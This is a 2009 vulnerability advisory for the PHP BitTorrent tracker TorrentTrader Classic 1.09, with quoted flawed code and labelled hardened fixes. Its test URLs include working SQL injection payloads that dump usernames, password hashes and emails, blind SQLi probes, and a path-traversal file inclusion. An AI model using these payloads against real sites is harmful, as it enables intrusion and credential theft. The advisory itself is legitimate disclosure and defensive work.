Multiple Vulnerabilities in TorrentTrader Classic 1.09



[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09
================================================================================

Author: Janek Vind "waraxe"
Date: 15. June 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-74.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TorrentTrader is a feature-packed and highly customisable PHP/MySQL-based
BitTorrent tracker, featuring integrated forums and plenty of administration
options. Please visit www.torrenttrader.org for the support forums.

http://sourceforge.net/projects/torrenttrader


List of found vulnerabilities
================================================================================

1. SQL Injection vulnerability in "account-inbox.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameter "origmsg" is used in an SQL query
Preconditions:
  1. attacker must be logged in as a valid user

Test:

http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes

Result: "MYSQL Error has occurred!"

-----------------------------[source code start]-------------------------------
if ($msg) {
  $msg = trim($msg);

  $res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");
  $user = mysql_fetch_assoc($res);
  if (!$user)
    $message = "Username not found.";
...

    if ($origmsg && $delete == "yes")
       mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr();
-----------------------------[source code end]---------------------------------
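A hardened form of the delete shown above, added here as an example and not TorrentTrader's own code: it validates "origmsg" as an integer, binds it through PDO instead of the mysql_* calls, and ties the row to the logged-in user. The PDO handle, the sender/receiver column names and the user-id argument (which the application would take from $CURUSER["id"]) are assumptions.

```php
<?php
// Added example (not TorrentTrader code): the "origmsg" delete from
// account-inbox.php rewritten so the id can only ever be an integer and the
// row can only be deleted by a party to the message. PDO replaces the
// mysql_* functions of the original; $pdo and the sender/receiver columns
// are assumptions, not taken from the advisory.
function delete_own_message(PDO $pdo, int $currentUserId, $origmsg, $delete): bool
{
    if ($delete !== "yes") {
        return false;
    }
    // Reject anything that is not a plain positive integer ("foobar",
    // "1 OR 1=1", "1,2") before it gets anywhere near the query.
    $id = filter_var($origmsg, FILTER_VALIDATE_INT, ["options" => ["min_range" => 1]]);
    if ($id === false) {
        return false;
    }
    // The value travels as a bound parameter, never as part of the SQL text,
    // and the WHERE clause ties the row to the logged-in user, so a valid
    // integer still cannot delete somebody else's message.
    $stmt = $pdo->prepare(
        "DELETE FROM messages WHERE id = :id AND (sender = :uid OR receiver = :uid2)"
    );
    $stmt->execute([":id" => $id, ":uid" => $currentUserId, ":uid2" => $currentUserId]);
    return $stmt->rowCount() === 1;
}
```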


2. Weak password generation algorithm in "account-recover.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. generated password is weak and can easily be brute-forced
Preconditions:
  1. attacker must know the email address associated with the target's account

TorrentTrader contains password reset functionality:

http://localhost/torrenttrader109/account-recover.php

Anyone can initiate a password reset; the only condition is that the target's email
address must be known. TorrentTrader will check the email address and, after successful
validation, a new temporary password will be generated and sent to that email address.
The autogenerated password appears to be a random number between 10000 and 50000,
so there can be only 40000 possible temporary passwords. It is easy to
write a brute-force script which tries all possible password combinations.
This process can take a couple of hours or more, but eventually the password will
be guessed and the target account becomes compromised.

-----------------------------[source code start]-------------------------------
if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") {
  $email = trim($_POST["email"]);
  if (!validemail($email)) {
	$msg = "" . NOT_VAILD_EMAIL . "";
	$kind = "Error";
  }
  else {
	  $res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1");
	  $arr = mysql_fetch_assoc($res);

	  if (!$arr) {
	    $msg = "" . EMAIL_INVALID . "";
	    $kind = "Error";
	  }
...
	  if ($arr) {
	  	$newpassword = rand(10000, 50000);
	  	$md5pass = md5($newpassword);
-----------------------------[source code end]---------------------------------
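An added example, not code from the project, of how the temporary credential could be issued instead: a 128-bit token from a CSPRNG, stored only as a hash with an expiry and consumed once. The password_resets table, its columns and the $pdo handle are assumptions.

```php
<?php
// Added example (not TorrentTrader code): replacement for the
// rand(10000, 50000) temporary password in account-recover.php. A 40000-value
// space is exhausted by trying every value; 16 random bytes give 2^128 values.
// Only a digest of the token is stored, with an expiry, so a dumped table does
// not hand out live reset tokens. Table/column names and $pdo are assumptions.
const RESET_TTL_SECONDS = 30 * 60;

function issue_reset_token(PDO $pdo, int $userId): string
{
    // random_bytes() is a CSPRNG; rand()/mt_rand() are not suitable for secrets.
    $token  = bin2hex(random_bytes(16));          // 32 hex chars, sent to the user
    $digest = hash('sha256', $token);             // only the digest is stored
    $stmt = $pdo->prepare(
        "INSERT INTO password_resets (userid, token_hash, expires) VALUES (:u, :h, :e)"
    );
    $stmt->execute([":u" => $userId, ":h" => $digest, ":e" => time() + RESET_TTL_SECONDS]);
    return $token;   // e-mail this; never the digest, never a password
}

function consume_reset_token(PDO $pdo, string $token): ?int
{
    $digest = hash('sha256', $token);
    $stmt = $pdo->prepare(
        "SELECT userid FROM password_resets WHERE token_hash = :h AND expires > :now"
    );
    $stmt->execute([":h" => $digest, ":now" => time()]);
    $userId = $stmt->fetchColumn();
    if ($userId === false) {
        return null;   // unknown, expired, or already used
    }
    // Single use: remove the record before the caller sets a new password.
    $del = $pdo->prepare("DELETE FROM password_resets WHERE token_hash = :h");
    $del->execute([":h" => $digest]);
    // The password the user chooses afterwards is stored with password_hash(),
    // not md5() as in the original snippet.
    return (int) $userId;
}
```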


3. Unauthorized database backup vulnerability in "backup-database.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. missing access control
Preconditions:
  1. mysqldump utility must be available
  2. gzip utility must be available
  3. target directory must be writable
  4. database name must be known in order to successfully guess the archive filename

Test:

http://localhost/torrenttrader109/backup-database.php

Resulting message: "Database backup successful, entry inserted into database."

-----------------------------[source code start]-------------------------------
system(sprintf(
  'mysqldump --opt -h %s -u %s -p%s %s | gzip > %s/%s/%s-%s-%s-%s.gz',
  $host,
  $user,
  $pass,
  $db,
  getenv('DOCUMENT_ROOT'),
  $backupdir,
  $db,
  $day,
  $month,
  $year
 ));
-----------------------------[source code end]---------------------------------

An attacker is able to create a database backup, and the resulting "gz" archive's
filename can be guessed if the attacker knows the database name. This file is also
directly downloadable from the website. Example download URI:

http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz

As a result, information leakage exists. For example, an attacker can fetch admin
credentials from the backed-up database.
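An added example (not the project's code) of the same backup call with the controls the advisory finds missing: an admin-only gate, an archive written outside the web root, an unpredictable filename and quoted shell arguments. The adminonly() guard is the one the advisory shows in other scripts; the backup path and the exact mysqldump invocation are assumptions.

```php
<?php
// Added example (not TorrentTrader code): backup-database.php with an access
// check, an archive outside DOCUMENT_ROOT so it cannot be fetched over HTTP,
// and a filename the requester cannot predict from the database name and date.
// Shell arguments are quoted, and the password goes via MYSQL_PWD instead of
// the command line, where a process listing would show it. adminonly() is the
// app's own guard seen in other snippets of the advisory; $backupRoot is assumed.
adminonly();

function run_backup(string $host, string $user, string $pass, string $db, string $backupRoot): string
{
    // Outside the web root, e.g. /var/backups/torrenttrader (assumed path).
    if (!is_dir($backupRoot) || !is_writable($backupRoot)) {
        throw new RuntimeException("backup directory not writable");
    }
    // The date is for humans; the random suffix defeats the
    // "torrenttrader109-10-06-2009.gz" guessing from the advisory.
    $name   = sprintf("%s-%s-%s.sql.gz", $db, date("Y-m-d"), bin2hex(random_bytes(8)));
    $target = $backupRoot . "/" . $name;

    $cmd = sprintf(
        "mysqldump --opt -h %s -u %s %s | gzip > %s",
        escapeshellarg($host),
        escapeshellarg($user),
        escapeshellarg($db),
        escapeshellarg($target)
    );
    putenv("MYSQL_PWD=" . $pass);   // read by mysqldump, not visible in argv
    exec($cmd, $output, $status);
    putenv("MYSQL_PWD=");           // blank it again
    if ($status !== 0) {
        @unlink($target);
        throw new RuntimeException("mysqldump failed with status $status");
    }
    chmod($target, 0600);
    return $target;
}
```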


4. SQL Injection vulnerability in "browse.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. uninitialized variable "wherecatin" is used in an SQL query
Preconditions:
  1. none

Test:

http://localhost/torrenttrader109/browse.php?wherecatin=waraxe

Result:

Unknown column 'waraxe' in 'where clause'

-----------------------------[source code start]-------------------------------
if (count($wherecatina) > 1)
$wherecatin = implode(",",$wherecatina);
elseif (count($wherecatina) == 1)
$wherea[] = "category = $wherecatina[0]";
...
if ($wherecatin)
$where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")";

if ($where != "")
$where = "WHERE $where";

$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error());
-----------------------------[source code end]---------------------------------

This specific SQL injection vulnerability can be exploited using blind attack
methods. If there are one or more active torrents in the database, then the
attack pattern below is usable:

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1

and we see the found torrents.

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1

"No torrents were found based on your search criteria."

In this way the attacker is able to ask the database boolean questions and retrieve
the needed information bit by bit: an example of classical blind SQL injection.

If there are no active torrents in the database, then the induced SQL errors method can be used.

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1

"Subquery returns more than 1 row"

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1

"No torrents were found based on your search criteria."
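An added example (not TorrentTrader code) of the category filter with every query variable initialised explicitly, which closes the register_globals path behind the "uninitialized variable" findings, and an IN(...) list built only from validated integers; the same helper is how the implode($_POST[...]) queries in items 11 to 15 below would be fixed. The "c" request key and the $pdo handle are assumptions.

```php
<?php
// Added example (not TorrentTrader code): the browse.php category filter
// rebuilt so that (a) every variable used in the query is initialised here,
// so a client cannot pre-seed "wherecatin", "where", "limit" or "categ"
// through register_globals, and (b) an IN(...) list is built only from
// validated integers. int_list() equally replaces the raw implode() over
// $_POST[delmp], $_POST[delreport], $_POST[delreq], $_POST['clases'] and
// $_POST['warndisable'] in items 11-15. $pdo is an assumed PDO connection.

/** Return only the elements that are positive integers, as ints, de-duplicated. */
function int_list($values): array
{
    if (!is_array($values)) {
        $values = [$values];
    }
    $out = [];
    foreach ($values as $v) {
        $i = filter_var($v, FILTER_VALIDATE_INT, ["options" => ["min_range" => 1]]);
        if ($i !== false) {
            $out[] = $i;
        }
    }
    return array_values(array_unique($out));
}

function count_torrents(PDO $pdo, array $request): int
{
    // Explicit initialisation: nothing a client sends can pre-seed these.
    $where  = [];
    $params = [];

    // "c[]=1&c[]=2" style category filter (key name assumed); every value
    // that survives int_list() is an int, so "waraxe" or "0) OR ..." is dropped.
    $cats = int_list($request["c"] ?? []);
    if ($cats) {
        // One "?" per value; the ints themselves are bound, not concatenated.
        $where[] = "category IN (" . implode(",", array_fill(0, count($cats), "?")) . ")";
        $params  = array_merge($params, $cats);
    }
    $sql  = "SELECT COUNT(*) FROM torrents" . ($where ? " WHERE " . implode(" AND ", $where) : "");
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return (int) $stmt->fetchColumn();
}
```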


5. Information leakage in "check.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. missing access control
Preconditions:
  1. none

Test:

http://localhost/torrenttrader109/check.php

This script is originally meant to be used by the installer and later by admins.
Because of the lacking access control, an attacker is able to use it for gathering some
useful information about the target system: the full path to the webroot, file and directory
permissions of specific files, and a couple of PHP settings.

6. SQL Injection vulnerability in "delreq.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameter "categ" is used in an SQL query
Preconditions:
  1. attacker must have at least super moderator privileges (user class > 3)
Comments:
  1. very easy to exploit

Test:

http://localhost/torrenttrader109/delreq.php?categ=waraxe

Result:

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near
'waraxe order by requests.request LIMIT 0,50' at line 1

Test 2:

http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+

and we can see all usernames, password hashes and emails from the database.


7. SQL Injection vulnerability in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameter "choice" is used in an SQL query
Preconditions:
  1. attacker must be logged in as a valid user
  2. there must exist at least one poll

Testing needs a custom-written HTML form:
-------------------------------------------------------------------------------

action="http://localhost/torrenttrader109/index.php" method="post">

-------------------------------------------------------------------------------

Result: "MYSQL Error has occurred!"

-----------------------------[source code start]-------------------------------
if ($_SERVER["REQUEST_METHOD"] == "POST")
{
  $choice = $_POST["choice"];
  if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice))
  {
    $res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr();
    $arr = mysql_fetch_assoc($res) or die("No poll");
    $pollid = $arr["id"];
    $userid = $CURUSER["id"];
    $res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr();
    $arr = mysql_fetch_assoc($res);
    if ($arr) die("Dupe vote");
    mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr();
-----------------------------[source code end]---------------------------------


8. SQL Injection vulnerability in "modrules.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameter "id" is used in an SQL query
Preconditions:
  1. attacker must have at least moderator privileges

Testing needs a custom-written HTML form:
-------------------------------------------------------------------------------

action="http://localhost/torrenttrader109/modrules.php?act=edited" method="post">
-------------------------------------------------------------------------------

Test result: "MYSQL Error has occurred!"

-----------------------------[source code start]-------------------------------
elseif ($_GET["act"]=="edited"){
  $id = $_POST["id"];
  $title = sqlesc($_POST["title"]);
  $text = sqlesc($_POST["text"]);
  $public = sqlesc($_POST["public"]);
  $class = sqlesc($_POST["class"]);
  mysql_query("update rules set title=$title, text=$text, public=$public,
  class=$class where id=$id") or sqlerr(__FILE__,__LINE__);
-----------------------------[source code end]---------------------------------


9. Information leakage in "phpinfo.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. missing access control
Preconditions:
  1. none

Test:

http://localhost/torrenttrader109/phpinfo.php

-----------------------------[source code start]-------------------------------

-----------------------------[source code end]---------------------------------

This script can be used by an attacker to obtain the output of the PHP function
phpinfo(). Access to such a script must be limited to admins, but currently there
is no access control at all.


10. SQL Injection vulnerabilities in "report.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameter "user" is used in an SQL query
  2. unsanitized user-submitted parameter "torrent" is used in an SQL query
  3. unsanitized user-submitted parameter "forumid" is used in an SQL query
  4. unsanitized user-submitted parameter "forumpost" is used in an SQL query
Preconditions:
  1. attacker must be logged in as a valid user

The two proof-of-concept tests below use the parameter "user".

Test 1 needs a custom-written HTML form:
-------------------------------------------------------------------------------

action="http://localhost/torrenttrader109/report.php" method="post">
-------------------------------------------------------------------------------

Test result: "MYSQL Error has occurred!"

Test 2 needs a custom-written HTML form:
-----------------------------[source code start]-------------------------------

action="http://localhost/torrenttrader109/report.php" method="post">
-----------------------------[source code end]---------------------------------

Test result: "You have already reported user ..."

This is the classical blind SQL injection exploitation method and allows the attacker to
fetch information from the database bit by bit by asking boolean questions.

The other three SQL injection vulnerabilities in "report.php" involve the user-submitted
parameters "torrent", "forumid" and "forumpost", and exploitation can be done in a
similar way as seen above.


11. SQL Injection vulnerability in "take-deletepm.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameter "delmp" is used in an SQL query
Preconditions:
  1. attacker must have admin privileges

-----------------------------[source code start]-------------------------------
if(isset($_POST["delmp"])) {
  $do="DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")";
  $res=mysql_query($do)
-----------------------------[source code end]---------------------------------


12. SQL Injection vulnerability in "takedelreport.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameter "delreport" is used in an SQL query
Preconditions:
  1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------
jmodonly();

$res = mysql_query ("SELECT id FROM reports WHERE dealtwith=0
AND id IN (" . implode(", ", $_POST[delreport]) . ")");
-----------------------------[source code end]---------------------------------


13. SQL Injection vulnerability in "takedelreq.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameter "delreq" is used in an SQL query
Preconditions:
  1. attacker must be logged in as a valid user

-----------------------------[source code start]-------------------------------
if (get_user_class() > UC_JMODERATOR){
...
  $do="DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")";
  $do2="DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")";
  $res2=mysql_query($do2);
  $res=mysql_query($do);
...
} else {
  foreach ($_POST[delreq] as $del_req){
    $delete_ok = checkRequestOwnership($CURUSER[id],$del_req);
    if ($delete_ok){
      $do="DELETE FROM requests WHERE id IN ($del_req)";
      $do2="DELETE FROM addedrequests WHERE requestid IN ($del_req)";
...
function checkRequestOwnership ($user, $delete_req){
  $query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr();
-----------------------------[source code end]---------------------------------



14. SQL Injection vulnerability in "takestaffmess.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameter "clases" is used in an SQL query
Preconditions:
  1. attacker must have admin privileges

-----------------------------[source code start]-------------------------------
adminonly();
...
$updateset = $_POST['clases'];

$query = mysql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")");
-----------------------------[source code end]---------------------------------


15. SQL Injection vulnerability in "takewarndisable.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameter "warndisable" is used in an SQL query
Preconditions:
  1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------
jmodonly();
...
if ($disable != '') {
  $do="UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
  $res=mysql_query($do);
}

if ($enable != '') {
  $do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
  $res = mysql_query($do);
}
-----------------------------[source code end]---------------------------------


16. SQL Injection vulnerability in "today.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. uninitialized variable "limit" is used in an SQL query
Preconditions:
  1. none
Comments:
  1. seems hard to exploit

Test:

http://localhost/torrenttrader109/today.php?limit=waraxe

Result:

"Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in C:\apache_wwwroot\torrenttrader109\today.php on line 21"


17. SQL Injection vulnerability in "torrents-details.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. uninitialized variable "where" is used in an SQL query
Preconditions:
  1. none

-----------------------------[source code start]-------------------------------
//speed mod
$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents
WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")
or sqlerr(__FILE__, __LINE__);
-----------------------------[source code end]---------------------------------

Exploitation is possible using blind SQL injection methods.

Test 1:

http://localhost/torrenttrader109/torrents-details.php?id=1&
where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+

Result: normal page

Test 2:

http://localhost/torrenttrader109/torrents-details.php?id=1&
where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+

Result: "MYSQL Error has occurred!"


18. SQL Injection vulnerability in "admin-delreq.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. uninitialized variable "categ" is used in an SQL query
Preconditions:
  1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------
jmodonly();
...
$res=mysql_query("SELECT users.username, requests.filled, requests.filledby,
requests.id, requests.userid, requests.request, requests.added, categories.name
as cat FROM requests inner join categories on requests.cat = categories.id
inner join users on requests.userid = users.id
$categ order by requests.request $limit") or print(mysql_error());
-----------------------------[source code end]---------------------------------

Test:

http://localhost/torrenttrader109/admin-delreq.php?categ=waraxe

Result: "You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use
near 'waraxe order by requests.request LIMIT 0,50' at line 1"


19. Persistent XSS in "viewrequests.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameters are used in response HTML generation
Preconditions:
  1. attacker must be logged in as a valid user

Steps for testing:

a) attacker submits a request:

http://localhost/torrenttrader109/requests.php

In the "Title" field let's insert some javascript:

testtitle

b) admin will browse requests:

http://localhost/torrenttrader109/viewrequests.php

and the previously planted javascript will be executed in the admin's session context.



20. Persistent XSS in logging functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameters are used in response HTML generation
Preconditions:
  1. attacker must be logged in as a valid user

Steps for testing:

a) attacker uploads a torrent file:

http://localhost/torrenttrader109/torrents-upload.php

In the "Torrent Name" field let's insert some javascript:

testname

Upload is successful: "The torrent has been uploaded successfully!"

b) admin will browse logs:

http://localhost/torrenttrader109/admin.php?act=view_log

and the previously planted javascript will be executed in the admin's session context.


21. Local File Inclusion vulnerability in "backend/admin-functions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. URI case-insensitivity on the Windows platform
Preconditions:
  1. Windows platform
  2. register_globals=on
  3. magic_quotes_gpc=off

-----------------------------[source code start]-------------------------------
if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die;
require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php");
-----------------------------[source code end]---------------------------------

As we can see from the source code snippet above, direct access to the script is blocked.
In the case of the Windows and Apache combination, URI handling is case-insensitive.
On the other hand, the "strpos()" function used for access control is case-sensitive.
So this script can be directly executed if we change some characters in the script's
filename to uppercase:

http://localhost/torrenttrader109/backend/Admin-functions.php

"Warning: require_once(./themes//block.php) [function.require-once]:
failed to open stream: No such file or directory in
C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3"

If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible:

http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00


22. Reflected XSS in multiple scripts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Examples:

http://localhost/torrenttrader109/themes/default/footer.php?ttversion=
http://localhost/torrenttrader109/themes/default/header.php?SITENAME=">
http://localhost/torrenttrader109/themes/default/header.php?CURUSER[username]=
http://localhost/torrenttrader109/visitorstoday.php?todayactive=
http://localhost/torrenttrader109/visitorsnow.php?activepeople=
http://localhost/torrenttrader109/faq.php?faq_categ[999][title]=&faq_categ[999][flag]=1
http://localhost/torrenttrader109/torrents-details.php?id=1&keepget=">


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who knows me!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ------------------------------------
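For item 21 above, an added example (not TorrentTrader code) of an include guard that does not depend on the letter case of REQUEST_URI, plus a theme lookup that whitelists the directory name instead of trusting $ss_uri; the TT_ENTRY constant and the themes directory layout are assumptions.

```php
<?php
// Added example (not TorrentTrader code), for item 21. Instead of matching
// REQUEST_URI with the case-sensitive strpos(), the included file checks a
// constant that only a legitimate entry point defines, so the case-insensitive
// Windows path "Admin-functions.php" changes nothing. The theme name is then
// checked against the real directory listing rather than taken from $ss_uri,
// which removes the "../../banners.txt%00" traversal as well.
// TT_ENTRY and the themes directory layout are assumptions.

// In the entry script (e.g. admin.php), before any include:
//     define('TT_ENTRY', true);

// At the top of backend/admin-functions.php:
if (!defined('TT_ENTRY')) {
    http_response_code(403);
    exit;
}

function resolve_theme_block(string $requestedTheme, string $themesDir): string
{
    // Accept only a bare directory name: no slashes, no NUL bytes, no dots.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $requestedTheme)) {
        throw new RuntimeException("invalid theme name");
    }
    // Whitelist against what is actually installed, not against the input.
    $installed = array_filter(scandir($themesDir), function ($d) use ($themesDir) {
        return $d[0] !== '.' && is_dir($themesDir . '/' . $d);
    });
    if (!in_array($requestedTheme, $installed, true)) {
        throw new RuntimeException("unknown theme");
    }
    $path = realpath($themesDir . '/' . $requestedTheme . '/block.php');
    // realpath() fails on a missing file and collapses any "..": make sure
    // the result still lives under the themes directory before including it.
    if ($path === false || strpos($path, realpath($themesDir) . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("theme block not found");
    }
    return $path;
}

// $ss_uri is assumed to be the configured theme name set by the application,
// replacing the $GLOBALS['ss_uri'] lookup that register_globals let a client fill.
require_once resolve_theme_block($ss_uri, __DIR__ . '/../themes');
```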
